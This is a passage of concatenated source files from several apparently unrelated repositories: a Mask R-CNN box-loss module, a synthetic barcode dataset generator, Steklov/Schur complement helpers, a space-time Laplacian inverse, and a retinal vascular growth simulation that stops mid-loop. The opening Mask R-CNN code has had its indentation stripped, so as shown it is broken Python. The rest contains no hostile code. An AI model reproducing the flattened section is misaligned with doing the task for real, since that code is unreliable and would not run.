ignore_inds = matched_idxs_per_image == Matcher.BETWEEN_THRESHOLDS
            labels_per_image.masked_fill_(ignore_inds, -1) # -1 is ignored by sampler
# compute regression targets
regression_targets_per_image = self.box_coder.encode(
matched_targets_per_image.bbox, proposals_per_image.bbox
)
labels.append(labels_per_image)
regression_targets.append(regression_targets_per_image)
matched_idxs.append(matched_idxs_per_image)
return labels, regression_targets, matched_idxs
def prepare_targets_batched(self, proposals, targets, target_labels):
num_images = proposals.size(0)
matched_idxs = self.match_targets_to_proposals_batched(proposals, targets)
img_idx = torch.arange(num_images, device = proposals.device)[:, None]
labels = target_labels[img_idx, matched_idxs.clamp(min=0)]
labels = labels.to(dtype=torch.int64)
bg_inds = matched_idxs == Matcher.BELOW_LOW_THRESHOLD
labels.masked_fill_(bg_inds, 0)
ignore_inds = matched_idxs == Matcher.BETWEEN_THRESHOLDS
labels.masked_fill_(ignore_inds, -1)
matched_targets = targets[img_idx, matched_idxs.clamp(min=0)]
regression_targets = self.box_coder.encode(
matched_targets.view(-1,4), proposals.view(-1,4)
)
return labels, regression_targets.view(num_images, -1, 4), matched_idxs
def subsample(self, proposals, targets):
"""
This method performs the positive/negative sampling, and return
the sampled proposals.
Note: this function keeps a state.
Arguments:
proposals (list[BoxList])
targets (list[BoxList])
"""
num_images = len(proposals[0])
target_boxes = pad_sequence([target.bbox for target in targets], batch_first = True, padding_value=-1)
target_labels = pad_sequence([target.get_field("labels") for target in targets], batch_first = True, padding_value = -1)
prop_boxes, prop_scores, image_sizes = proposals[0], proposals[1], proposals[2]
labels, regression_targets, matched_idxs = self.prepare_targets_batched(prop_boxes, target_boxes, target_labels)
# scores is used as a mask, -1 means box is invalid
if self.syncfree and num_images == 1:
sampled_pos_inds, sampled_neg_inds = self.fg_bg_sampler(labels, is_rpn=0, objectness=prop_scores)
device = sampled_pos_inds[0].device
import maskrcnn_benchmark.Syncfree
inds, counts = maskrcnn_benchmark.Syncfree.balanced_pos_neg_sampler_repeat(
sampled_pos_inds[0], torch.empty([0], device=device, dtype=torch.int64),
sampled_neg_inds[0], torch.empty([0], device=device, dtype=torch.int64),
self.fg_bg_sampler.batch_size_per_image,
self.fg_bg_sampler.batch_size_per_image,
True)
sampled_pos_inds_mask = (torch.arange(0,self.fg_bg_sampler.batch_size_per_image,1, device=device) < counts[0]).unsqueeze(1)
prop_boxes = prop_boxes.view(-1,4)
regression_targets = regression_targets.view(-1,4)
labels = labels.view(-1)
matched_idxs = matched_idxs.view(-1)
result_proposals = []
for i in range(num_images):
box = BoxList(prop_boxes[inds], image_size = image_sizes[i])
box.add_field("matched_idxs", matched_idxs[inds])
box.add_field("regression_targets", regression_targets[inds])
box.add_field("labels", labels[inds])
result_proposals.append(box)
self._proposals = result_proposals
return result_proposals
else:
if num_images == 1:
sampled_pos_inds, sampled_neg_inds = self.fg_bg_sampler(labels, is_rpn=0, objectness=prop_scores)
# when num_images=1, sampled pos inds only has 1 item, so avoid copy in torch.cat
with torch.cuda.nvtx.range("NZ2"):
pos_inds_per_image = [torch.nonzero(sampled_pos_inds[0]).squeeze(1)]
neg_inds_per_image = [torch.nonzero(sampled_neg_inds[0]).squeeze(1)]
else:
sampled_pos_inds, sampled_neg_inds, num_pos_samples, num_neg_samples = self.fg_bg_sampler(labels, is_rpn=0, objectness=prop_scores)
pos_inds_per_image = sampled_pos_inds.split(list(num_pos_samples))
neg_inds_per_image = sampled_neg_inds.split(list(num_neg_samples))
prop_boxes = prop_boxes.view(-1,4)
regression_targets = regression_targets.view(-1,4)
labels = labels.view(-1)
matched_idxs = matched_idxs.view(-1)
result_proposals = []
for i in range(num_images):
inds = torch.cat([pos_inds_per_image[i], neg_inds_per_image[i]])
box = BoxList(prop_boxes[inds], image_size = image_sizes[i])
box.add_field("matched_idxs", matched_idxs[inds])
box.add_field("regression_targets", regression_targets[inds])
box.add_field("labels", labels[inds])
result_proposals.append(box)
self._proposals = result_proposals
return result_proposals
def __call__(self, class_logits, box_regression):
"""
Computes the loss for Faster R-CNN.
This requires that the subsample method has been called beforehand.
Arguments:
class_logits (list[Tensor])
box_regression (list[Tensor])
Returns:
classification_loss (Tensor)
box_loss (Tensor)
"""
class_logits = cat(class_logits, dim=0)
box_regression = cat(box_regression, dim=0)
device = class_logits.device
if not hasattr(self, "_proposals"):
raise RuntimeError("subsample needs to be called before")
proposals = self._proposals
labels = cat([proposal.get_field("labels") for proposal in proposals], dim=0)
regression_targets = cat(
[proposal.get_field("regression_targets") for proposal in proposals], dim=0
)
classification_loss = F.cross_entropy(class_logits, labels)
# get indices that correspond to the regression targets for
# the corresponding ground truth labels, to be used with
# advanced indexing
with torch.cuda.nvtx.range("NZ4"):
sampled_pos_inds_subset = torch.nonzero(labels > 0).squeeze(1)
labels_pos = labels.index_select(0, sampled_pos_inds_subset)
if self.cls_agnostic_bbox_reg:
if self.const4567 is None:
self.const4567 = torch.tensor([4, 5, 6, 7], pin_memory=True).cuda(non_blocking=True)
map_inds = self.const4567
else:
with torch.cuda.nvtx.range("H2D1"):
if self.const0123 is None:
self.const0123 = torch.tensor([0, 1, 2, 3], pin_memory=True).cuda(non_blocking=True)
map_inds = 4 * labels_pos[:, None] + self.const0123
index_select_indices=((sampled_pos_inds_subset[:,None]) * box_regression.size(1) + map_inds).view(-1)
box_regression_sampled=box_regression.view(-1).index_select(0, index_select_indices).view(map_inds.shape[0],
map_inds.shape[1])
regression_targets_sampled = regression_targets.index_select(0, sampled_pos_inds_subset)
box_loss = smooth_l1_loss(
box_regression_sampled,
regression_targets_sampled,
size_average=False,
beta=1,
)
box_loss = box_loss / labels.numel()
return classification_loss, box_loss
def make_roi_box_loss_evaluator(cfg):
matcher = Matcher(
cfg.MODEL.ROI_HEADS.FG_IOU_THRESHOLD,
cfg.MODEL.ROI_HEADS.BG_IOU_THRESHOLD,
allow_low_quality_matches=False,
)
bbox_reg_weights = cfg.MODEL.ROI_HEADS.BBOX_REG_WEIGHTS
box_coder = BoxCoder(weights=bbox_reg_weights)
fg_bg_sampler = BalancedPositiveNegativeSampler(
cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE, cfg.MODEL.ROI_HEADS.POSITIVE_FRACTION
)
cls_agnostic_bbox_reg = cfg.MODEL.CLS_AGNOSTIC_BBOX_REG
loss_evaluator = FastRCNNLossComputation(
matcher,
fg_bg_sampler,
box_coder,
cls_agnostic_bbox_reg
)
return loss_evaluator
``` |
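The `__call__` method above avoids 2-D advanced indexing by flattening the (proposal, class) indices and doing a single `index_select` on the flattened regression tensor. A standalone sketch of that gather with made-up shapes, plus the equivalent advanced-indexing form for comparison:
```python
# Hedged sketch of the class-specific box-regression gather used above:
# box_regression has 4 values per class, and for each positive sample we pick
# the 4 values belonging to its label. Shapes and values are made up.
import torch

num_props, num_classes = 8, 5
box_regression = torch.randn(num_props, 4 * num_classes)
labels = torch.randint(0, num_classes, (num_props,))

pos_inds = torch.nonzero(labels > 0).squeeze(1)
labels_pos = labels.index_select(0, pos_inds)
map_inds = 4 * labels_pos[:, None] + torch.tensor([0, 1, 2, 3])

# flatten row/column indices into 1-D offsets, then one index_select
flat_inds = (pos_inds[:, None] * box_regression.size(1) + map_inds).view(-1)
gathered = box_regression.view(-1).index_select(0, flat_inds).view(-1, 4)

# equivalent 2-D advanced indexing, shown for comparison
assert torch.equal(gathered, box_regression[pos_inds[:, None], map_inds])
```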
{
"source": "jquenum/Barcodes-dataset-generator",
"score": 3
} |
#### File: jquenum/Barcodes-dataset-generator/generate_one_image.py
```python
import numpy as np
import cv2
import os
import random
import matplotlib.pyplot as plt
from tqdm import tqdm
from wordcloud import WordCloud
from random_words import RandomWords
from PIL import Image
import glob
# np.random.seed(42)
import pickle
clean_barcodes = []
for i in tqdm(range(36)):
with open("clean_barcodes_{}.pickle".format(i), 'rb') as f:
clean_barcodes += pickle.load(f)
def UpsamplingImage(img, up_sampling_factor = 2):
w = int(img.shape[1]*up_sampling_factor)
h = int(img.shape[0]*up_sampling_factor)
img_up = np.array(Image.fromarray(img).resize((w, h), resample=Image.BILINEAR))
return img_up
def show_images_overlayed_single (Im1, Im1_mask, title1=""):
a = 0.5 #transparency parameter
plt.figure(figsize=[10, 20])
plt.subplot(1, 2, 1)
plt.imshow(Im1, cmap="gray")
plt.subplot(1, 2, 2)
plt.imshow(Im1_mask, cmap="gray")
plt.figure(figsize=[10, 10])
plt.imshow(Im1, cmap="gray")
plt.imshow(Im1_mask, alpha=a)
def overlay(src, dest, upper_left):
x_start = upper_left[0]
x_end = upper_left[0] + src.shape[0]
y_start = upper_left[1]
y_end = upper_left[1] + src.shape[1]
dest[x_start:x_end, y_start:y_end] = src
return dest
def rotateImage(img, angle, borderValue=255):
(h, w) = img.shape
(cX, cY) = (w // 2, h // 2)
M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
cos = np.abs(M[0, 0])
sin = np.abs(M[0, 1])
nW = int((h * sin) + (w * cos))
nH = int((h * cos) + (w * sin))
M[0, 2] += (nW / 2) - cX
M[1, 2] += (nH / 2) - cY
return cv2.warpAffine(img, M, (nW, nH), borderMode=cv2.BORDER_CONSTANT,flags = cv2.INTER_AREA, borderValue=borderValue)
# warp img2 to img1 with homograph H
def warpTwoImages(img1, img2, H, borderValue=255):
h1,w1 = img1.shape[:2]
h2,w2 = img2.shape[:2]
pts1 = np.float32([[0,0],[0,h1],[w1,h1],[w1,0]]).reshape(-1,1,2)
pts2 = np.float32([[0,0],[0,h2],[w2,h2],[w2,0]]).reshape(-1,1,2)
pts2_ = cv2.perspectiveTransform(pts2, H)
pts = np.concatenate((pts1, pts2_), axis=0)
[xmin, ymin] = np.int32(pts.min(axis=0).ravel() - 0.5)
[xmax, ymax] = np.int32(pts.max(axis=0).ravel() + 0.5)
t = [-xmin,-ymin]
Ht = np.array([[1,0,t[0]],[0,1,t[1]],[0,0,1]]) # translate
result = cv2.warpPerspective(img2, Ht.dot(H), (xmax-xmin, ymax-ymin), borderMode=cv2.BORDER_CONSTANT, borderValue = borderValue)
result[t[1]:h1+t[1],t[0]:w1+t[0]] = img1
return result
def HomographyImage(img, x_bl, x_br, borderValue=255):
h, w = img.shape
pts_src = np.array([[0, 0], #top left
[0, w], #top right
[h, 0], #bottom left
[h, w]]) #bottom right
pts_dst = np.array([[0, 0], #top left
[0, w], #top right
[x_bl, 0], #bottom left
[x_br, w]]) #bottom right
H_mat, status = cv2.findHomography(pts_src, pts_dst)
out_hom_temp = cv2.warpPerspective(img, H_mat, (h,w), borderMode=cv2.BORDER_CONSTANT, borderValue = borderValue)
return warpTwoImages(out_hom_temp, img, H_mat, borderValue)
def ImEnlarger(im, Max_height, Max_width, borderValue=255):
#print(im.shape[0], im.shape[1])
row, col = im.shape
if row > Max_height or col > Max_width:
raise AttributeError("image is already larger than Max_size")
tpad_ = int(Max_height - row) // 2
bpad_ = int(Max_height - row) - tpad_
lpad_ = int(Max_width - col) // 2
rpad_ = int(Max_width - col) - lpad_
padded = cv2.copyMakeBorder(im, tpad_, bpad_, lpad_, rpad_, \
cv2.BORDER_CONSTANT, value=borderValue)
return padded
def DownsamplingImage(img, down_sampling_factor = 2):
w = int(img.shape[1]//down_sampling_factor)
h = int(img.shape[0]//down_sampling_factor)
img_down = np.array(Image.fromarray((img).astype(np.uint8)).resize((w, h), resample=Image.BILINEAR))
return img_down
def generateRandomWords(word_count = 120):
random_words = RandomWords().random_words(count=word_count)
    # str.capitalize()/str.upper() return new strings, so write the results back
    third = word_count // 3
    random_words[:third] = [word.capitalize() for word in random_words[:third]]
    random_words[third:2*third] = [word.upper() for word in random_words[third:2*third]]
random_numbers = [str(num) for num in np.random.randint(1000, 10000000, size=word_count//3)]
words = ' '.join(random_words + random_numbers)
return words
"""
all_empty_images = []
print("loading empty images")
for im_name in tqdm(glob.glob("./empty_images/*.jpg")):
all_empty_images.append(cv2.imread(im_name))
def generate_random_background(background_shape):
rand_im = np.random.choice(all_empty_images)
h, w, c = rand_im.shape
max_h, max_w = h - background_shape[0], w - background_shape[1]
rand_h, rand_w = np.random.randint(0, max_h), np.random.randint(0, max_w)
return rand_im[rand_h:rand_h+background_shape[0], rand_w:rand_w+background_shape[1]]
"""
barcode_index = 0
def generate_one_training_image(num_barcodes = 5, barcode_border = 10, final_width = 2000, final_height = 2000, word_count = 120):
words = generateRandomWords(word_count=word_count)
image_width = final_width * 17 // 30
image_height = final_height * 17 // 30
image_size = min(image_width, image_height)
background = WordCloud(width=image_width, height=image_height, min_font_size=1, max_font_size=image_size*4//100,\
max_words=image_size//10, background_color="white", \
color_func=lambda *args, **kwargs: "black").generate(words).to_array()
background = cv2.cvtColor(background, cv2.COLOR_RGB2GRAY)
#background = WordCloud(width=image_width, height=image_height, min_font_size=1, max_font_size=image_size*4//100,\
# max_words=image_size//10, background_color=(1, 1, 1), \
# color_func=lambda *args, **kwargs: (0, 0, 0)).generate(words).to_array()
#im = generate_random_background((image_height, image_width))
#background = np.multiply(im, background)
mask_background_no_margin = np.zeros(background.shape)
all_single_barcode_masks = []
# paste barcodes on background
for i in range(num_barcodes):
global barcode_index
barcode = clean_barcodes[barcode_index % len(clean_barcodes)]
barcode_index += 1
barcode = barcode.astype(np.uint8)
barcode = UpsamplingImage(barcode, (final_width / 2000))
# barcode = cv2.cvtColor(barcode, cv2.COLOR_GRAY2RGB)
margined_barcode = cv2.copyMakeBorder(barcode, \
barcode_border, barcode_border, barcode_border, barcode_border,\
cv2.BORDER_CONSTANT, value=255)
# paste one barcode
paste_barcode_try = 0 # in case there is no possible no-overlap place
while (paste_barcode_try < 100):
x, y = np.random.randint(barcode_border, background.shape[1] - margined_barcode.shape[1]), np.random.randint(barcode_border, background.shape[0] - margined_barcode.shape[0])
upper_left = (y, x)
# check if target area contains any 255
if mask_background_no_margin[y-barcode_border:y+margined_barcode.shape[0],\
x-barcode_border:x+margined_barcode.shape[1]].max() > 0:
paste_barcode_try += 1
continue
background = overlay(margined_barcode, background, upper_left)
upper_left_no_margin = (upper_left[0] + barcode_border, upper_left[1] + barcode_border)
mask_background_no_margin = overlay(np.ones(barcode.shape) * 255, mask_background_no_margin, upper_left_no_margin)
single_barcode_mask = overlay(np.ones(barcode.shape) * 255, np.zeros(background.shape), upper_left_no_margin)
all_single_barcode_masks.append(single_barcode_mask)
break
# rotate and homography
rotation_angle = np.random.randint(0, 360)
homography_dst = (np.random.randint(background.shape[0], background.shape[0]*3//2), \
np.random.randint(background.shape[0], background.shape[0]*3//2))
background = rotateImage(HomographyImage(background, homography_dst[0], homography_dst[1]), rotation_angle)
mask_background_no_margin = rotateImage(HomographyImage(mask_background_no_margin, homography_dst[0],
homography_dst[1], borderValue=0),
rotation_angle, borderValue=0)
all_single_barcode_masks = [rotateImage(HomographyImage(single_barcode_mask, homography_dst[0],
homography_dst[1], borderValue=0),
rotation_angle, borderValue=0) for single_barcode_mask in all_single_barcode_masks]
# enlarge and generate dark border
border_color = np.random.randint(0, 200)
background = ImEnlarger(background, final_height, final_width, borderValue=border_color)
mask_background_no_margin = ImEnlarger(mask_background_no_margin, final_height, final_width, borderValue=0)
all_single_barcode_masks = [ImEnlarger(single_barcode_mask, final_height, final_width, borderValue=0) for single_barcode_mask in all_single_barcode_masks]
# darken
darkenFactor = np.clip(np.random.normal(0.9, 0.2), 0.5, 1.0)
    background = darkenFactor*background.astype(float)  # the np.float alias was removed in newer NumPy
# find bounding boxes
all_bbx = []
for im in all_single_barcode_masks:
contours, _ = cv2.findContours(im.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
idx = 0
x,y,w,h = cv2.boundingRect(contours[0])
all_bbx.append([x,y,x+w,y+h])
return background, mask_background_no_margin, all_single_barcode_masks, all_bbx
``` |
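A minimal usage sketch for the generator above. It assumes the module imports as `generate_one_image`, which requires the `clean_barcodes_*.pickle` files to be present (they are loaded at import time); the output filenames are illustrative.
```python
# Hedged usage sketch: produce one synthetic training image plus its masks and
# bounding boxes. Importing the module loads clean_barcodes_*.pickle, so this
# only runs where those pickles exist.
import cv2
import numpy as np
from generate_one_image import generate_one_training_image

image, full_mask, barcode_masks, bboxes = generate_one_training_image(num_barcodes=3)

cv2.imwrite("sample_image.png", image.astype(np.uint8))
cv2.imwrite("sample_mask.png", full_mask.astype(np.uint8))
for x1, y1, x2, y2 in bboxes:
    print("barcode bbox:", x1, y1, x2, y2)
```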
{
"source": "jquetzalcoatl/SyntheticVasculature",
"score": 3
} |
#### File: jquetzalcoatl/SyntheticVasculature/DtN_tools.py
```python
import numpy as np
import matplotlib.pyplot as plt
def schur_comp(M,idx_set):
"""
computes the schur complement/the pieces of the schur complement for a matrix M
"""
comp_idx = [i for i in range(len(M)) if i not in idx_set]
A = M[np.ix_(idx_set,idx_set)]
B = M[np.ix_(idx_set,comp_idx)]
C = M[np.ix_(comp_idx,idx_set)]
D = M[np.ix_(comp_idx,comp_idx)]
return A - B @ np.linalg.inv(D) @ C, [A,B,C,D]
def steklov_spec(M,bdy_idx):
"""
computes the steklov spectrum corresponding to a Laplacian M and boundary nodes bdy_idx
"""
eigvals, eigvecs = np.linalg.eig(schur_comp(M,bdy_idx)[0])
eigval_sort = np.argsort(eigvals)
return eigvals[eigval_sort], eigvecs.T[eigval_sort]
def harmonic_extension(schur,u):
Hu = np.linalg.solve(schur[3],-schur[2]@u)
return Hu
```
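A small self-contained example of the pieces above, using the graph Laplacian of a 4-cycle with vertices 0 and 2 treated as the boundary (the graph is made up for illustration, and `DtN_tools` is assumed to be importable from the repository root):
```python
# Hedged example: Steklov spectrum and harmonic extension on a tiny graph.
# The 4-cycle Laplacian below is illustrative; DtN_tools only needs a square
# symmetric matrix and a list of boundary indices.
import numpy as np
from DtN_tools import schur_comp, steklov_spec, harmonic_extension

A = np.array([[0, 1, 0, 1],
              [1, 0, 1, 0],
              [0, 1, 0, 1],
              [1, 0, 1, 0]], dtype=float)
L = np.diag(A.sum(axis=1)) - A        # graph Laplacian
bdy = [0, 2]                          # treat vertices 0 and 2 as the boundary

dtn, blocks = schur_comp(L, bdy)      # blocks = [A, B, C, D]
eigvals, eigvecs = steklov_spec(L, bdy)
print("DtN (Schur complement):\n", dtn)
print("Steklov eigenvalues:", eigvals)

u_bdy = np.array([1.0, -1.0])         # boundary data
u_int = harmonic_extension(blocks, u_bdy)
print("harmonic extension to interior vertices:", u_int)
```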
#### File: SyntheticVasculature/OT_sims/laplacian_inverse.py
```python
import time
# Mathematical functions
import numpy as np
import scipy.sparse as scsp
import scipy.sparse.linalg as scspl
from numpy import linalg as lin
from math import *
def buildLaplacianMatrix(geomDic, eps):
"""Return a function which inverts the space-time Laplacian
Args:
geomDic: a dictionnary containing the relevant quantities concerning the space time domain
eps: a parameter to regularize the pb, we compute the inverse of [Laplacian + esp * Identity]
"""
# Unwrap what is needed in the dictionnary
nTime = geomDic["nTime"]
DeltaTime = geomDic["DeltaTime"]
nVertices = geomDic["nVertices"]
LaplacianDMatrix = geomDic["LaplacianDMatrix"]
areaVertices = geomDic["areaVertices"]
# Laplacian matrix in Time
# Usual 1D Laplace equation
LaplacianTimeMatrix = np.zeros((nTime + 1, nTime + 1))
# Fill the interior
for alpha in range(1, nTime):
LaplacianTimeMatrix[alpha, alpha] = -2.0
LaplacianTimeMatrix[alpha, alpha + 1] = 1.0
LaplacianTimeMatrix[alpha, alpha - 1] = 1.0
# Fill the upper left corner
LaplacianTimeMatrix[0, 1] = 1.0
LaplacianTimeMatrix[0, 0] = -1.0
# Fill the lower right corner
LaplacianTimeMatrix[-1, -2] = 1.0
LaplacianTimeMatrix[-1, -1] = -1.0
LaplacianTimeMatrix *= 1 / (DeltaTime ** 2)
# Array of 1/sqrt(2) except for the first and last coefficient
diagTimeMOH = 1 / sqrt(2) * np.ones(nTime + 1)
diagTimeMOH[0] = 1.0
diagTimeMOH[-1] = 1.0
# Same as the previous matrix, but vectorized in nVertices
diagTimeMOHVectorized = np.kron(diagTimeMOH, np.ones(nVertices)).reshape(
(nTime + 1, nVertices)
)
# Diagonalizing in Time and factorizing in D ----------------------------------------
startFact = time.time()
print("Factorizing the Laplace matrix...")
# Express the Laplacian in its new basis
LaplacianTimeMatrixModified = np.dot(
np.diag(diagTimeMOH), np.dot(LaplacianTimeMatrix, np.diag(diagTimeMOH))
)
# Compute the spectral decomposition of the Laplacian in Time
eigenValTime, eigenVectTime = np.linalg.eigh(LaplacianTimeMatrixModified)
# Prefactorizing the Laplace matrix
# For each eigenvalue lambda_i, listFactor[i] contains a method to
# solve (-lambda_i Id + Laplacian_D)x = b.
listFactor = []
for alpha in range(nTime + 1):
factor = scspl.factorized(
(
3. * LaplacianDMatrix
- eps * scsp.eye(nVertices)
+ eigenValTime[alpha] / 3. * scsp.diags([areaVertices], [0])
).tocsc()
)
listFactor.append(factor)
def LaplacianAuxInvert(input):
# Diagonalizing
input_diag = np.array(np.dot(eigenVectTime.transpose(), input))
# Solving for each line eigenvector
solution = np.zeros((nTime + 1, nVertices))
for alpha in range(nTime + 1):
solution[alpha, :] = listFactor[alpha](input_diag[alpha, :])
# Inverse diagonalization
output = np.array(np.dot(eigenVectTime, solution))
return output
def LaplacianInvert(input):
return np.multiply(
diagTimeMOHVectorized,
LaplacianAuxInvert(np.multiply(input, diagTimeMOHVectorized)),
)
endFact = time.time()
print(
"Factorizing the Laplace matrix: " + str(round(endFact - startFact, 2)) + "s."
)
return LaplacianInvert
```
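A toy illustration of how `buildLaplacianMatrix` is meant to be called. The geometry dictionary below is fabricated (a 3-vertex path graph, 2 time steps) purely to show the expected keys and the `(nTime + 1, nVertices)` input/output shape; it assumes `OT_sims/` is on `sys.path`.
```python
# Hedged toy example: build the space-time Laplacian inverter for a fabricated
# geometry dictionary. All numbers are placeholders used to exercise the API.
import numpy as np
import scipy.sparse as scsp
from laplacian_inverse import buildLaplacianMatrix

nVertices, nTime = 3, 2
Adj = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]], dtype=float)
Lap = scsp.csr_matrix(np.diag(Adj.sum(axis=1)) - Adj)   # path-graph Laplacian

geomDic = {
    "nTime": nTime,
    "DeltaTime": 1.0 / nTime,
    "nVertices": nVertices,
    "LaplacianDMatrix": Lap,
    "areaVertices": np.ones(nVertices),
}
LaplacianInvert = buildLaplacianMatrix(geomDic, eps=0.1)

rhs = np.random.rand(nTime + 1, nVertices)   # one value per (time, vertex)
sol = LaplacianInvert(rhs)
print(sol.shape)                             # (nTime + 1, nVertices)
```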
#### File: SyntheticVasculature/simulations/auxin_model.py
```python
import numpy as np
g_fovea_pos = [0.0, 0.0, -1.0]
g_od_pos = [0.5, 0.0, -0.5*np.sqrt(3)]
def sphere_init_config(fovea_radius = 0.3,lens_depth = 0.3,num_pts = 100,inner_rad = 0.8,outer_rad = 1.2,prune_into_eye = True,bounding_box = None):
sample = []
while(len(sample) < num_pts):
pt = np.random.normal(size = 3)
pt /= np.linalg.norm(pt)
pt_rad = np.random.rand()*(outer_rad-inner_rad)+inner_rad
sample_pt = [pt,pt_rad]
if bounding_box is None:
if prune_into_eye:
if ((pt*pt_rad)[-1] <= 1-lens_depth) \
and (np.linalg.norm(pt*pt_rad - np.array(g_fovea_pos)) \
>= fovea_radius):
sample.append(sample_pt)
else:
if prune_into_eye:
if ((pt*pt_rad)[-1] <= 1-lens_depth) \
and (np.linalg.norm(pt*pt_rad - np.array(g_fovea_pos)) \
>= fovea_radius) and (isInBox(pt*pt_rad,bounding_box)):
sample.append(sample_pt)
return np.array(sample,dtype=object)
def geodesic_dist(p1,p2):
p1norm = np.linalg.norm(p1[0])
p2norm = np.linalg.norm(p2[0])
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
return np.arccos(p1dotp2) + np.abs(p1[1] - p2[1])
def tangent_vector(p1,p2,normalized = True):
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
p2bar = p2[0] - (p1dotp2)*np.array(p1[0])
p2bar /= np.linalg.norm(p2bar)
#print(p1dotp2)
if normalized:
return np.array([p2bar,(p2[1]-p1[1])/np.abs(p2[1]-p1[1])],dtype=object)
else:
return np.array([(np.arccos(p1dotp2))*p2bar, p2[1]-p1[1]],dtype=object)
def exp_map(pt, direction):
dirnorm = np.linalg.norm(direction[0])
#pt_dot_dir = np.dot(pt,dir)
#dir_bar = dir - pt_dot_dir*np.array(pt)
#dir_bar /= np.linalg.norm(dir_bar)
#theta_star = np.arccos(pt_dot_dir)
return np.array([np.cos(dirnorm)*np.array(pt[0]) + np.sin(dirnorm)*np.array(direction[0])/dirnorm,pt[1]+direction[1] ],dtype=object)
def isInInterval(pt, interval):
if (pt >= interval[0]) and (pt <= interval[1]):
return True
else:
return False
def isInBox(pt, bbox):
"""
pt should be of theform [x,y,z],
bbox should be [[xlow,xhigh],[ylow,yhigh],[zlow,zhigh]]
"""
if sum([isInInterval(pt[i],bbox[i]) for i in range(len(pt))]) == 3:
return True
else:
return False
def vascular_growth_sim(fovea_radius = 0.2,lens_depth = 0.5,max_iter = 1000,init_num_pts = 200,inner_rad = 0.7,outer_rad = 1.2,D_step = 0.9,death_dist = None,init_vasc = None,bounding_box=None):
"""
if init_vasc is None, then initialize pt_list and vascular structure
otherwise, init_vasc = (pt_list )
"""
if death_dist is None:
shell_vol = 4.*np.pi*0.5
approx_cover_rad = 0.1*np.sqrt((shell_vol/init_num_pts)*(3./4.)/np.pi)
death_dist = approx_cover_rad
#set up data structure
if init_vasc is None:
        pt_list = np.array([[g_od_pos, outer_rad]], dtype=object)  # explicit object dtype so np.vstack below also works on newer NumPy
to_grow_indicator = np.array([1])
branches = [[0]]
branch_membership = [[0]]
else:
pt_list = list(init_vasc[0])
branches = init_vasc[1]
branch_membership = init_vasc[2]
#construct the indicator for whether a point is at the end of a branch
# by looping through branches
to_grow_indicator = np.zeros(len(pt_list))
for b in branches:
to_grow_indicator[b[-1]] = 1.
#sample auxin
sample_auxin = sphere_init_config(fovea_radius = fovea_radius,lens_depth = lens_depth,num_pts = init_num_pts,inner_rad = inner_rad,outer_rad = outer_rad,bounding_box = bounding_box)
init_sample = np.array(sample_auxin)
#print("sampled points are: \n");print(sample_auxin)
#set up auxin-vein node distance chart
auxin_vein_dists = [geodesic_dist(pt_list[0],s) for s in sample_auxin]
auxin_min_dists = [[0,d] for d in auxin_vein_dists ]
active_auxin = np.arange(len(init_sample))
#print("sampled point dists are: \n");print(auxin_vein_dists)
#print("sampled point dists are: \n");print(auxin_min_dists)
count = 0
#"while there are auxin nodes"
#while((count < max_iter) and (len(sample_auxin)>0)):
while((count < max_iter) and (len(active_auxin)>0)):
count += 1
#manually find the nearest neighbor
nns = [[] for pt in pt_list]
#print("getting nearest neighbors for {} auxin".format(len(sample_auxin)))
#for i in range(len(sample_auxin)):
for i in active_auxin:
#if i in list_deleted_red:
# continue
#match the nearest neighbor of an auxin node to the index of said auxin node
nns[int(auxin_min_dists[i][0])].append(i)
#
#now compute the step vectors
#print("the to grow indicators are {}".format(to_grow_indicator))
for i in range(len(pt_list))[::-1]:
#print("the nearest neighbors for {} are {}".format(i,nns[i]))
#print("pt {} s nearest neighbors are: {}".format(i,nns[i]))
if len(nns[i])>0:
#check if the given point is a head or not
#if not, generate a new branch
if to_grow_indicator[i] == 0:
branches.append([i])
branch_membership[i].append(len(branches)-1)
#compute the new step size
step_vec = sum([(1./len(nns[i]))*tangent_vector(pt_list[i],sample_auxin[k],normalized = False) for k in nns[i]])
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
#check whether the proposed point is in the bounding box
#have a boolean defaulted to true, and then possibly turn to false otherwise
in_box_indicator = True
if bounding_box is not None:
if not isInBox(vprime[1]*vprime[0],bounding_box):
in_box_indicator = False
#if the new point is far enough away from the fovea:
if (np.linalg.norm(vprime[1]*vprime[0] - np.array(g_fovea_pos))\
> fovea_radius) and in_box_indicator:
#print("growing from {} to {}".format(pt_list[i],vprime))
#add the new point to the list of points
pt_list = np.vstack([pt_list,vprime])
#change the old grow indicator to 0
to_grow_indicator[i] = 0
#change the new grow indicator to 1
to_grow_indicator = np.append(to_grow_indicator,1)
#add branch information for this new branch
branch_membership.append([branch_membership[i][-1]])
branches[branch_membership[i][-1]].append(len(to_grow_indicator)-1)
#update distance array
#dists = np.array([geodesic_dist(vprime,s) for s in sample_auxin])
dists = np.array([geodesic_dist(vprime,sample_auxin[j]) for j in active_auxin])
#print("distances to auxin for vprime are: {}".format(dists))
#set up auxin-vein node distance chart
#auxin_vein_dists = np.vstack([auxin_vein_dists,dists])
#update min distances
#for j in range(len(sample_auxin))[::-1]:
temp_active_len = len(active_auxin)
for idx, j in enumerate(active_auxin):
if dists[idx] <= auxin_min_dists[j][1]:
#update the min distance array
#sample_auxin = np.delete(sample_auxin,j,0)
#print(f"idx: {idx}"); print(f"j: {j}")
#active_auxin = np.delete(active_auxin,temp_active_len-idx-1,0)
auxin_min_dists[j][1] = dists[idx]
auxin_min_dists[j][0] = len(to_grow_indicator)-1
#prune auxin nodes
#alternative: updated list_deleted_red
#for j in range(len(sample_auxin))[::-1]:
#for j in active_auxin[::-1]:
#first check whether or not the new point got close enough to an auxin node
#print(dists)
#if auxin_min_dists[j][1] < death_dist:
temp_active_len = len(active_auxin)
for j in np.arange(temp_active_len)[::-1]:
#first check whether or not the new point got close enough to an auxin node
if auxin_min_dists[active_auxin[j]][1] < death_dist:
#delete auxin
#sample_auxin = np.delete(sample_auxin,j,0)
#active_auxin = np.delete(active_auxin,j,0)
active_auxin = np.delete(active_auxin,j)
#auxin_vein_dists = np.delete(auxin_vein_dists,j,1)
